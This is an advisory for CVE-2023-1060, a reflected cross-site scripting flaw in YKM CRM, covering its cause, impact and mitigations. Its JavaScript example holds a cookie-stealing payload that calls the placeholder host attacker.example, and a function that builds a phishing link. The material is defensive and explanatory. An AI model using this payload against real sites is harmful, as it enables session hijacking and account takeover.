CVE-2023-1060 in YKM
Summary
by MITRE • 03/31/2023
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YKM YKM CRM allows Reflected XSS.
This issue affects YKM CRM: before 23.03.30.
Analysis
by VulDB Data Team • 06/01/2026
This cross-site scripting vulnerability originates from inadequate input validation and output encoding within the YKM CRM web application's page generation logic. The flaw lies in how the application takes user-supplied data, typically from URL parameters or form fields, and renders it into a web page without neutralizing the characters that are significant in HTML. An attacker exploits it by crafting a request whose malicious payload is reflected back in the response. The issue affects all versions prior to 23.03.30, the release that addresses it. Because the XSS is reflected, the injected script runs in the victim's browser, in the context of the CRM's origin, when the victim opens a specially crafted link or visits an attacker-controlled page that issues the request on their behalf.
Technically, the vulnerability stems from the application's failure to escape or encode user-controllable data before incorporating it into dynamically generated HTML. This is a classic instance of CWE-79, Improper Neutralization of Input During Web Page Generation, where input flows into HTML output without context-appropriate encoding. Injected JavaScript executes in the victim's browser with the privileges of the victim's authenticated session, potentially enabling session hijacking, credential theft, or redirection to malicious sites. The reflected variant does not persist the payload server-side: the payload travels in the request and is echoed into the immediate response, so each victim must be induced to send the crafted request, which is why exploitation typically relies on social engineering such as phishing links or a lure page that submits the request automatically.
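The following is an added example, not YKM CRM's code, showing the CWE-79 pattern described above in a hypothetical CRM search page: `renderVulnerable()` interpolates the raw `q` parameter into both an element body and an attribute value, while `renderHardened()` applies HTML entity encoding first. The payload and the `attacker.example` host are constructed for illustration.

```javascript
// Added example (not YKM's code): a hypothetical CRM "search" page that reflects
// the q parameter. renderVulnerable() interpolates the raw value, the pattern
// behind CWE-79; renderHardened() applies HTML entity encoding first.

// Encode the five characters that can change HTML structure. Correct for
// element-body and quoted-attribute contexts; JavaScript, URL and CSS contexts
// need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: q lands unchanged in both an element body and an attribute value.
function renderVulnerable(q) {
  return `<h1>Results for ${q}</h1>\n<input name="q" value="${q}">`;
}

// Hardened: same template, but q is encoded before insertion.
function renderHardened(q) {
  const safe = escapeHtml(q);
  return `<h1>Results for ${safe}</h1>\n<input name="q" value="${safe}">`;
}

// Constructed payload of the kind used in reflected XSS: closes the attribute,
// then adds a script that sends the session cookie to an attacker host
// (attacker.example is a placeholder).
const PAYLOAD = '"><script>location="https://attacker.example/?c="+document.cookie</script>';

// The link an attacker would send to a victim; the payload is URL-encoded so
// the browser delivers it intact in the query string.
function craftedLink(base) {
  return `${base}/crm/search?q=${encodeURIComponent(PAYLOAD)}`;
}

// Crude check used below: does the rendered HTML contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable page contains <script>:', containsScriptTag(renderVulnerable(PAYLOAD)));
console.log('hardened page contains <script>:  ', containsScriptTag(renderHardened(PAYLOAD)));
console.log('phishing link:', craftedLink('https://crm.example.com'));
```

Note that encoding is applied at output time, per context, rather than by "sanitizing" input on the way in; the same value must be encoded differently if it is later placed inside a `<script>` block or a URL, and a blocklist of dangerous strings at input time is what attackers routinely bypass.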
The operational impact extends beyond simple data theft, because the injected script acts with whatever rights the victim holds in the CRM. An attacker could craft malicious URLs that, when opened by authenticated users, execute scripts that steal session cookies, redirect users to phishing sites, or issue requests that modify CRM data on the victim's behalf. The vulnerability's scope is limited to the web application layer, but it affects any user who interacts with the vulnerable CRM, and administrators are the most valuable targets since a script running in their session can act with their elevated privileges. For organizations using YKM CRM this creates a significant risk of unauthorized access to sensitive customer data, modification of business records, and, if an administrator is targeted, changes to user accounts and configuration.
Organizations should update to version 23.03.30 or later, the release the advisory names as addressing this vulnerability. Additional mitigations include a Content Security Policy that disallows inline script, which blocks the most common reflected payloads even if an encoding gap remains; a web application firewall to detect and block known payload patterns, with the caveat that WAF rules are bypassable and are no substitute for correct output encoding; and regular security testing to find similar flaws. The ATT&CK mapping for this vulnerability is T1566 (Phishing) and T1071.001 (Application Layer Protocol: Web Protocols), reflecting that exploitation depends on delivering a crafted link to a victim. Security teams should also educate users to recognize suspicious links and monitor web server logs for requests whose query strings contain HTML or script fragments, as well as for unusual access patterns or data modifications that might indicate successful exploitation.